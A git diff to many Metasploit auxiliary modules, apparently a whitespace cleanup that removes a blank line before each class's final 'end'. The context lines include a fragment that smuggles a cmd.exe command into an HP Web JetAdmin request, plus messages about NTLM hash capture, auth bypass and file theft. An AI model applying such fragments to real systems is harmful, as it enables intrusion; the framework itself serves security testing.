diff --git a/modules/auxiliary/admin/2wire/xslt_password_reset.rb b/modules/auxiliary/admin/2wire/xslt_password_reset.rb index 9cf9cf6fb2..db41cacd26 100644 --- a/modules/auxiliary/admin/2wire/xslt_password_reset.rb +++ b/modules/auxiliary/admin/2wire/xslt_password_reset.rb @@ -136,5 +136,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb b/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb index 47a0910ecb..4a79999eb5 100644 --- a/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb +++ b/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb @@ -177,5 +177,4 @@ class MetasploitModule < Msf::Auxiliary def run exploit end - end diff --git a/modules/auxiliary/admin/appletv/appletv_display_video.rb b/modules/auxiliary/admin/appletv/appletv_display_video.rb index a962253956..86c94a0428 100644 --- a/modules/auxiliary/admin/appletv/appletv_display_video.rb +++ b/modules/auxiliary/admin/appletv/appletv_display_video.rb @@ -151,5 +151,4 @@ class MetasploitModule < Msf::Auxiliary print_status("Video request sent. Duration set: #{datastore['TIME']} seconds") play_video_uri end - end diff --git a/modules/auxiliary/admin/backupexec/dump.rb b/modules/auxiliary/admin/backupexec/dump.rb index 94c03e0d20..40f706639e 100644 --- a/modules/auxiliary/admin/backupexec/dump.rb +++ b/modules/auxiliary/admin/backupexec/dump.rb @@ -268,5 +268,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb index 446e9d4056..dc2a66489b 100644 --- a/modules/auxiliary/admin/backupexec/registry.rb +++ b/modules/auxiliary/admin/backupexec/registry.rb @@ -267,5 +267,4 @@ class MetasploitModule < Msf::Auxiliary NDR.long(hive) return stub end - end diff --git a/modules/auxiliary/admin/chromecast/chromecast_reset.rb b/modules/auxiliary/admin/chromecast/chromecast_reset.rb index e6257b7223..f26bd9bf1d 100644 --- a/modules/auxiliary/admin/chromecast/chromecast_reset.rb +++ b/modules/auxiliary/admin/chromecast/chromecast_reset.rb @@ -78,5 +78,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end end - end diff --git a/modules/auxiliary/admin/chromecast/chromecast_youtube.rb b/modules/auxiliary/admin/chromecast/chromecast_youtube.rb index 271cd34a8f..daa5293938 100644 --- a/modules/auxiliary/admin/chromecast/chromecast_youtube.rb +++ b/modules/auxiliary/admin/chromecast/chromecast_youtube.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end end - end diff --git a/modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb b/modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb index 90e0726c1f..efe9f7eb23 100644 --- a/modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb +++ b/modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb @@ -219,5 +219,4 @@ class MetasploitModule < Msf::Auxiliary ver end - end diff --git a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb index c745e9767b..77e63d6288 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb +++ b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Auxiliary print_status("Deltas: #{deltas.map{|x| "%.8x" % x}.join(", ")}") end end - end diff --git a/modules/auxiliary/admin/firetv/firetv_youtube.rb b/modules/auxiliary/admin/firetv/firetv_youtube.rb index fed418e293..b096c906ef 100644 --- a/modules/auxiliary/admin/firetv/firetv_youtube.rb +++ b/modules/auxiliary/admin/firetv/firetv_youtube.rb @@ -83,5 +83,4 @@ class MetasploitModule < Msf::Auxiliary fail_with(Failure::Unreachable, e) end end - end diff --git a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb index 06d80a9c23..9d96658907 100644 --- a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb +++ b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb @@ -89,5 +89,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end end - end diff --git a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb index f3a2f3a860..1ae4bd5ddb 100644 --- a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb +++ b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb @@ -268,5 +268,4 @@ class MetasploitModule < Msf::Auxiliary print_status("Use it to log into #{login_url}") end end - end diff --git a/modules/auxiliary/admin/http/axigen_file_access.rb b/modules/auxiliary/admin/http/axigen_file_access.rb index 13d25cb78f..008f6e9710 100644 --- a/modules/auxiliary/admin/http/axigen_file_access.rb +++ b/modules/auxiliary/admin/http/axigen_file_access.rb @@ -172,5 +172,4 @@ class MetasploitModule < Msf::Auxiliary return false end - end diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb index 06ef75e878..f9bc0671a9 100644 --- a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb +++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb @@ -44,5 +44,4 @@ class MetasploitModule < Msf::Auxiliary 'data' => 'obj=Httpd:ExecuteFile(,cmd.exe,/c,' + cmd + ',)' }, 3) end - end diff --git a/modules/auxiliary/admin/http/iis_auth_bypass.rb b/modules/auxiliary/admin/http/iis_auth_bypass.rb index b9749e209f..159e3913c8 100644 --- a/modules/auxiliary/admin/http/iis_auth_bypass.rb +++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb @@ -86,5 +86,4 @@ class MetasploitModule < Msf::Auxiliary print_good("You can bypass auth by doing: #{bypass_string}") end end - end diff --git a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb index 230cc79874..ac64fc1553 100644 --- a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb +++ b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb @@ -169,5 +169,4 @@ class MetasploitModule < Msf::Auxiliary return false end - end diff --git a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb index b0aaf2f618..881035c955 100644 --- a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb +++ b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb @@ -152,5 +152,4 @@ class MetasploitModule < Msf::Auxiliary path = store_loot('nexpose.file','text/plain', rhost, doc.root.elements["//host"].first.to_s, "File from Nexpose server #{rhost}") print_good("File saved to path: " << path) end - end diff --git a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb index 0fc6db6bf1..6ac3f35fda 100644 --- a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb +++ b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb @@ -59,5 +59,4 @@ class MetasploitModule < Msf::Auxiliary print_error("File not deleted") end end - end diff --git a/modules/auxiliary/admin/http/scrutinizer_add_user.rb b/modules/auxiliary/admin/http/scrutinizer_add_user.rb index c24e4ab5ff..a8e91cf311 100644 --- a/modules/auxiliary/admin/http/scrutinizer_add_user.rb +++ b/modules/auxiliary/admin/http/scrutinizer_add_user.rb @@ -81,5 +81,4 @@ class MetasploitModule < Msf::Auxiliary print_line(res.body) end end - end diff --git a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb index 16e9b94bdd..8c72886410 100644 --- a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb +++ b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb @@ -118,5 +118,4 @@ class MetasploitModule < Msf::Auxiliary print_good("File saved in: #{path}") end - end diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb index 42e4353cf1..39a0732c30 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb @@ -146,5 +146,4 @@ class MetasploitModule < Msf::Auxiliary print_error("#{rhost}:#{rport} [Typo3-SA-2009-001] Failed to retrieve file #{datastore['RFILE']}") end - end diff --git a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb index 5bbfc38286..4a05ea1364 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb @@ -137,5 +137,4 @@ class MetasploitModule < Msf::Auxiliary print_error("#{rhost}:#{rport} [Typo3-SA-2010-020] Failed to retrieve file #{datastore['RFILE']}") end - end diff --git a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb index cb1bbf83ac..b3dd313c32 100644 --- a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb +++ b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb @@ -197,5 +197,4 @@ class MetasploitModule < Msf::Auxiliary print_error("Maybe try checking the ACTIONS - Currently using #{action.name}") end - end diff --git a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb index 2010b6ea70..18ce958505 100644 --- a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb +++ b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb @@ -104,5 +104,4 @@ class MetasploitModule < Msf::Auxiliary return end end - end diff --git a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb index 981dc45b6a..6be7af340d 100644 --- a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb +++ b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb @@ -71,5 +71,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index 888415734a..4420aa6c6b 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb @@ -257,5 +257,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb index dbddc6c137..aa04239735 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb @@ -216,5 +216,4 @@ class MetasploitModule < Msf::Auxiliary # Create full sid "0x#{domain_sid}#{principal_id}" end - end diff --git a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb index 62c4761a3d..040294470c 100644 --- a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb +++ b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb @@ -452,5 +452,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/admin/mssql/mssql_idf.rb b/modules/auxiliary/admin/mssql/mssql_idf.rb index 583c8d710c..90eac7e148 100644 --- a/modules/auxiliary/admin/mssql/mssql_idf.rb +++ b/modules/auxiliary/admin/mssql/mssql_idf.rb @@ -163,5 +163,4 @@ class MetasploitModule < Msf::Auxiliary print_line disconnect end - end diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb index 57b43d4e9f..6430fb70c5 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb @@ -76,5 +76,4 @@ class MetasploitModule < Msf::Auxiliary print_good("Go check your SMB relay or capture module for goodies!") end - end diff --git a/modules/auxiliary/admin/mysql/mysql_enum.rb b/modules/auxiliary/admin/mysql/mysql_enum.rb index aceb824352..208c9b6af9 100644 --- a/modules/auxiliary/admin/mysql/mysql_enum.rb +++ b/modules/auxiliary/admin/mysql/mysql_enum.rb @@ -240,5 +240,4 @@ class MetasploitModule < Msf::Auxiliary mysql_logoff end - end diff --git a/modules/auxiliary/admin/mysql/mysql_sql.rb b/modules/auxiliary/admin/mysql/mysql_sql.rb index 2989fa8458..9c8a7c9fe3 100644 --- a/modules/auxiliary/admin/mysql/mysql_sql.rb +++ b/modules/auxiliary/admin/mysql/mysql_sql.rb @@ -40,5 +40,4 @@ class MetasploitModule < Msf::Auxiliary print_status(" | #{row.join(" | ")} |") end end - end diff --git a/modules/auxiliary/admin/natpmp/natpmp_map.rb b/modules/auxiliary/admin/natpmp/natpmp_map.rb index 58cb658756..2a4171daa1 100644 --- a/modules/auxiliary/admin/natpmp/natpmp_map.rb +++ b/modules/auxiliary/admin/natpmp/natpmp_map.rb @@ -115,5 +115,4 @@ class MetasploitModule < Msf::Auxiliary print_error("Unknown error: #{e.class} #{e.backtrace}") end end - end diff --git a/modules/auxiliary/admin/netbios/netbios_spoof.rb b/modules/auxiliary/admin/netbios/netbios_spoof.rb index 6aaf0c6b39..e83c9b6686 100644 --- a/modules/auxiliary/admin/netbios/netbios_spoof.rb +++ b/modules/auxiliary/admin/netbios/netbios_spoof.rb @@ -97,5 +97,4 @@ class MetasploitModule < Msf::Auxiliary disconnect_udp end - end diff --git a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb index 0328d8fb75..4b9545685d 100644 --- a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb +++ b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/admin/oracle/oracle_sql.rb b/modules/auxiliary/admin/oracle/oracle_sql.rb index 9226b6e8bb..564afcd20a 100644 --- a/modules/auxiliary/admin/oracle/oracle_sql.rb +++ b/modules/auxiliary/admin/oracle/oracle_sql.rb @@ -46,5 +46,4 @@ class MetasploitModule < Msf::Auxiliary return end end - end diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb index 0ca237d4e2..df4447bcbf 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb @@ -77,5 +77,4 @@ class MetasploitModule < Msf::Auxiliary prepare_exec(dropp) end - end diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb index c1f89c2453..5d7a09f332 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb @@ -88,5 +88,4 @@ EOF prepare_exec(dropp) end - end diff --git a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb index e506b72db7..3695fa6dab 100644 --- a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb +++ b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb @@ -49,5 +49,4 @@ class MetasploitModule < Msf::Auxiliary send_cmd( ['QUIT'] , true) disconnect end - end diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 2b37b8292b..ff0ab6b8d1 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -317,6 +317,5 @@ class MetasploitModule < Msf::Auxiliary result end - end diff --git a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb index 43a086316c..64c1522f8a 100644 --- a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb +++ b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb @@ -137,5 +137,4 @@ class MetasploitModule < Msf::Auxiliary print_good("#{rhost}:#{rport} - File saved in: #{path}") end - end diff --git a/modules/auxiliary/admin/scada/modicon_password_recovery.rb b/modules/auxiliary/admin/scada/modicon_password_recovery.rb index e2b521c22d..0ec97dcf45 100644 --- a/modules/auxiliary/admin/scada/modicon_password_recovery.rb +++ b/modules/auxiliary/admin/scada/modicon_password_recovery.rb @@ -243,5 +243,4 @@ class MetasploitModule < Msf::Auxiliary # ) print_line logins.to_s end - end diff --git a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb index d38d17c780..c14ff941eb 100644 --- a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb +++ b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb @@ -304,5 +304,4 @@ class MetasploitModule < Msf::Auxiliary def cleanup disconnect rescue nil end - end diff --git a/modules/auxiliary/admin/scada/multi_cip_command.rb b/modules/auxiliary/admin/scada/multi_cip_command.rb index 5f8ae7c223..8d3521189c 100644 --- a/modules/auxiliary/admin/scada/multi_cip_command.rb +++ b/modules/auxiliary/admin/scada/multi_cip_command.rb @@ -135,5 +135,4 @@ class MetasploitModule < Msf::Auxiliary return nil end end - end diff --git a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb index 2a20c2dbaa..cfa0bed3f8 100644 --- a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb +++ b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb @@ -124,6 +124,5 @@ class MetasploitModule < Msf::Auxiliary def on_client_close(c) stop_service end - end diff --git a/modules/auxiliary/admin/serverprotect/file.rb b/modules/auxiliary/admin/serverprotect/file.rb index f3b87514a0..6226d62022 100644 --- a/modules/auxiliary/admin/serverprotect/file.rb +++ b/modules/auxiliary/admin/serverprotect/file.rb @@ -394,5 +394,4 @@ class MetasploitModule < Msf::Auxiliary nil end end - end diff --git a/modules/auxiliary/admin/smb/delete_file.rb b/modules/auxiliary/admin/smb/delete_file.rb index f631453256..1c05542f59 100644 --- a/modules/auxiliary/admin/smb/delete_file.rb +++ b/modules/auxiliary/admin/smb/delete_file.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Auxiliary print_error("Unable to login: #{e.message}") end end - end diff --git a/modules/auxiliary/admin/smb/download_file.rb b/modules/auxiliary/admin/smb/download_file.rb index 4dba6ddf29..c3f90ade62 100644 --- a/modules/auxiliary/admin/smb/download_file.rb +++ b/modules/auxiliary/admin/smb/download_file.rb @@ -76,5 +76,4 @@ class MetasploitModule < Msf::Auxiliary print_error("Unable to login: #{e.message}") end end - end diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index e6cc6fa6b3..075dc0af9f 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -177,5 +177,4 @@ class MetasploitModule < Msf::Auxiliary print_status("Cleanup was successful") end end - end diff --git a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb index ac03de5762..c0b1adf598 100644 --- a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb +++ b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb @@ -253,5 +253,4 @@ class MetasploitModule < Msf::Auxiliary end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") end - end diff --git a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb index 7e692ef26b..9e8ec7e45e 100644 --- a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb +++ b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb @@ -59,5 +59,4 @@ class MetasploitModule < Msf::Auxiliary print_status("\t\\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\") print_line("") end - end diff --git a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb index 8b8d172047..8701d7a516 100644 --- a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb +++ b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb @@ -155,5 +155,4 @@ class MetasploitModule < Msf::Auxiliary print_status("TTDB reply: 0x%x, %d" % arr) sunrpc_destroy end - end diff --git a/modules/auxiliary/admin/tftp/tftp_transfer_util.rb b/modules/auxiliary/admin/tftp/tftp_transfer_util.rb index 96ace31988..f656102586 100644 --- a/modules/auxiliary/admin/tftp/tftp_transfer_util.rb +++ b/modules/auxiliary/admin/tftp/tftp_transfer_util.rb @@ -215,5 +215,4 @@ class MetasploitModule < Msf::Auxiliary vprint_status [rtarget,msg].join end end - end diff --git a/modules/auxiliary/admin/vmware/poweron_vm.rb b/modules/auxiliary/admin/vmware/poweron_vm.rb index 227633f95e..c44e99375b 100644 --- a/modules/auxiliary/admin/vmware/poweron_vm.rb +++ b/modules/auxiliary/admin/vmware/poweron_vm.rb @@ -56,5 +56,4 @@ class MetasploitModule < Msf::Auxiliary return end end - end diff --git a/modules/auxiliary/admin/vmware/tag_vm.rb b/modules/auxiliary/admin/vmware/tag_vm.rb index 368e1cf50c..c28b70e74e 100644 --- a/modules/auxiliary/admin/vmware/tag_vm.rb +++ b/modules/auxiliary/admin/vmware/tag_vm.rb @@ -60,5 +60,4 @@ class MetasploitModule < Msf::Auxiliary return end end - end diff --git a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb index a97b8c104d..c2a4d040a2 100644 --- a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb +++ b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb @@ -47,5 +47,4 @@ class MetasploitModule < Msf::Auxiliary return end end - end diff --git a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb index 403815bbde..1087d07f45 100644 --- a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb +++ b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb @@ -82,5 +82,4 @@ class MetasploitModule < Msf::Auxiliary wdbrpc_client_disconnect end - end diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb index 7d1eb963ca..e326b697d9 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb @@ -102,5 +102,4 @@ class MetasploitModule < Msf::Auxiliary print_status("Dumped #{"0x%.8x" % idx} bytes.") wdbrpc_client_disconnect end - end diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb index a32e0c314f..56d310d7ed 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb @@ -52,5 +52,4 @@ class MetasploitModule < Msf::Auxiliary wdbrpc_client_disconnect end - end diff --git a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb index 8cf1dceda2..7675b1f5b5 100644 --- a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb +++ b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb @@ -101,5 +101,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git a/modules/auxiliary/admin/webmin/file_disclosure.rb b/modules/auxiliary/admin/webmin/file_disclosure.rb index c8e987bcdd..0ea88e032a 100644 --- a/modules/auxiliary/admin/webmin/file_disclosure.rb +++ b/modules/auxiliary/admin/webmin/file_disclosure.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Auxiliary print_status("No response from the server") end end - end diff --git a/modules/auxiliary/admin/zend/java_bridge.rb b/modules/auxiliary/admin/zend/java_bridge.rb index 34e5cd999f..b57e76224a 100644 --- a/modules/auxiliary/admin/zend/java_bridge.rb +++ b/modules/auxiliary/admin/zend/java_bridge.rb @@ -80,5 +80,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end diff --git a/modules/auxiliary/analyze/jtr_aix.rb b/modules/auxiliary/analyze/jtr_aix.rb index ae348e0cf9..451d751f02 100644 --- a/modules/auxiliary/analyze/jtr_aix.rb +++ b/modules/auxiliary/analyze/jtr_aix.rb @@ -93,5 +93,4 @@ class MetasploitModule < Msf::Auxiliary print_status "Hashes Written out to #{hashlist.path}" hashlist.path end - end diff --git a/modules/auxiliary/analyze/jtr_oracle_fast.rb b/modules/auxiliary/analyze/jtr_oracle_fast.rb index 2f881556b3..573c08b302 100644 --- a/modules/auxiliary/analyze/jtr_oracle_fast.rb +++ b/modules/auxiliary/analyze/jtr_oracle_fast.rb @@ -107,5 +107,4 @@ class MetasploitModule < Msf::Auxiliary end end end - end diff --git a/modules/auxiliary/analyze/jtr_postgres_fast.rb b/modules/auxiliary/analyze/jtr_postgres_fast.rb index da90279349..f95261a179 100644 --- a/modules/auxiliary/analyze/jtr_postgres_fast.rb +++ b/modules/auxiliary/analyze/jtr_postgres_fast.rb @@ -119,5 +119,4 @@ class MetasploitModule < Msf::Auxiliary print_status "Hashes written out to #{hashlist.path}" hashlist.path end - end diff --git a/modules/auxiliary/bnat/bnat_scan.rb b/modules/auxiliary/bnat/bnat_scan.rb index e9da761180..cd8033ac2f 100644 --- a/modules/auxiliary/bnat/bnat_scan.rb +++ b/modules/auxiliary/bnat/bnat_scan.rb @@ -96,5 +96,4 @@ class MetasploitModule < Msf::Auxiliary close_pcap end - end diff --git a/modules/auxiliary/client/mms/send_mms.rb b/modules/auxiliary/client/mms/send_mms.rb index 7861634a22..9f4bf12a84 100644 --- a/modules/auxiliary/client/mms/send_mms.rb +++ b/modules/auxiliary/client/mms/send_mms.rb @@ -28,5 +28,4 @@ class MetasploitModule < Msf::Auxiliary print_error(e.message) end end - end diff --git a/modules/auxiliary/client/sms/send_text.rb b/modules/auxiliary/client/sms/send_text.rb index 051008df8b..dbd63be10d 100644 --- a/modules/auxiliary/client/sms/send_text.rb +++ b/modules/auxiliary/client/sms/send_text.rb @@ -31,5 +31,4 @@ class MetasploitModule < Msf::Auxiliary print_error(e.message) end end - end diff --git a/modules/auxiliary/client/smtp/emailer.rb b/modules/auxiliary/client/smtp/emailer.rb index 41e03b7dfc..cacfbdcc71 100644 --- a/modules/auxiliary/client/smtp/emailer.rb +++ b/modules/auxiliary/client/smtp/emailer.rb @@ -217,5 +217,4 @@ class MetasploitModule < Msf::Auxiliary print_status("Email sent..") end - end diff --git a/modules/auxiliary/crawler/msfcrawler.rb b/modules/auxiliary/crawler/msfcrawler.rb index 4493eed27c..1c8872f844 100644 --- a/modules/auxiliary/crawler/msfcrawler.rb +++ b/modules/auxiliary/crawler/msfcrawler.rb @@ -403,7 +403,6 @@ class MetasploitModule < Msf::Auxiliary def hashsig(hashreq) hashreq.to_s end - end class BaseParser diff --git a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb index 97a31074f6..1793796005 100644 --- a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb +++ b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb @@ -43,7 +43,6 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end =begin diff --git a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb index f326cc4ec4..05b605bc1e 100644 --- a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb +++ b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb @@ -63,5 +63,4 @@ class MetasploitModule < Msf::Auxiliary req[28,6] = chaddr req + payload end - end diff --git a/modules/auxiliary/dos/dns/bind_tkey.rb b/modules/auxiliary/dos/dns/bind_tkey.rb index 80e6b9e15c..1f1fd24537 100644 --- a/modules/auxiliary/dos/dns/bind_tkey.rb +++ b/modules/auxiliary/dos/dns/bind_tkey.rb @@ -83,5 +83,4 @@ class MetasploitModule < Msf::Auxiliary query << txt_length # TXT Length query << txt # TXT end - end diff --git a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb index 36546ecd6b..3cb66a412b 100644 --- a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb +++ b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb @@ -39,5 +39,4 @@ class MetasploitModule < Msf::Auxiliary disconnect end - end diff --git a/modules/auxiliary/dos/http/3com_superstack_switch.rb b/modules/auxiliary/dos/http/3com_superstack_switch.rb index 04aa47d418..134a231a47 100644 --- a/modules/auxiliary/dos/http/3com_superstack_switch.rb +++ b/modules/auxiliary/dos/http/3com_superstack_switch.rb @@ -50,5 +50,4 @@ class MetasploitModule < Msf::Auxiliary end end - end diff --git 